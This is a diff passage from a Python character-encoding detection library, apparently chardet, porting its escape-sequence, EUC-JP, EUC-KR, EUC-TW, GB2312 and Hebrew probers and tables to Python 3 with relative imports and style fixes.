for codingSM in self._mCodingSM:
if not codingSM: continue
codingSM.active = constants.True
if not codingSM:
continue
codingSM.active = True
codingSM.reset()
self._mActiveSM = len(self._mCodingSM)
self._mDetectedCharset = None
@ -61,19 +65,22 @@ class EscCharSetProber(CharSetProber):
def feed(self, aBuf):
for c in aBuf:
# PY3K: aBuf is a byte array, so c is an int, not a byte
for codingSM in self._mCodingSM:
if not codingSM: continue
if not codingSM.active: continue
codingState = codingSM.next_state(c)
if not codingSM:
continue
if not codingSM.active:
continue
codingState = codingSM.next_state(wrap_ord(c))
if codingState == constants.eError:
codingSM.active = constants.False
codingSM.active = False
self._mActiveSM -= 1
if self._mActiveSM <= 0:
self._mState = constants.eNotMe
return self.get_state()
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
self._mDetectedCharset = codingSM.get_coding_state_machine()
self._mDetectedCharset = codingSM.get_coding_state_machine() # nopep8
return self.get_state()
return self.get_state()

View File

@ -13,62 +13,62 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart, eError, eItsMe
HZ_cls = ( \
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = ( \
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
@ -79,50 +79,50 @@ HZSMModel = {'classTable': HZ_cls,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
@ -133,51 +133,51 @@ ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'charLenTable': ISO2022CNCharLenTable,
'name': "ISO-2022-CN"}
ISO2022JP_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
@ -188,47 +188,47 @@ ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
@ -238,3 +238,5 @@ ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa

View File

@ -13,25 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCJPDistributionAnalysis
from jpcntx import EUCJPContextAnalysis
from mbcssm import EUCJPSMModel
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
@ -51,30 +52,34 @@ class EUCJPProber(MultiByteCharSetProber):
def feed(self, aBuf):
aLen = len(aBuf)
for i in xrange(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mContextAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()

View File

@ -592,3 +592,5 @@ EUCKRCharToFreqOrder = ( \
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa

View File

@ -13,22 +13,23 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCKRDistributionAnalysis
from mbcssm import EUCKRSMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCKRDistributionAnalysis
from .mbcssm import EUCKRSMModel
class EUCKRProber(MultiByteCharSetProber):
def __init__(self):

View File

@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -26,8 +26,8 @@
######################### END LICENSE BLOCK #########################
# EUCTW frequency table
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# <http:#www.edu.tw:81/mandr/>
# 128 --> 0.42261
@ -38,15 +38,15 @@
#
# Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75
# Char to FreqOrder table ,
# Char to FreqOrder table ,
EUCTW_TABLE_SIZE = 8102
EUCTWCharToFreqOrder = ( \
EUCTWCharToFreqOrder = (
1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742
3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758
1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774
@ -424,3 +424,5 @@ EUCTWCharToFreqOrder = ( \
8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710
8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726
8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742
# flake8: noqa

View File

@ -25,10 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCTWDistributionAnalysis
from mbcssm import EUCTWSMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCTWDistributionAnalysis
from .mbcssm import EUCTWSMModel
class EUCTWProber(MultiByteCharSetProber):
def __init__(self):

View File

@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -36,14 +36,14 @@
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ration = 512 / (3755 - 512) = 0.157
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = ( \
GB2312CharToFreqOrder = (
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
@ -469,3 +469,4 @@ GB2312CharToFreqOrder = ( \
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
# flake8: noqa

View File

@ -25,10 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import GB2312DistributionAnalysis
from mbcssm import GB2312SMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312SMModel
class GB2312Prober(MultiByteCharSetProber):
def __init__(self):

View File

@ -13,20 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetprober import CharSetProber
import constants
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
@ -35,40 +36,40 @@ import constants
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
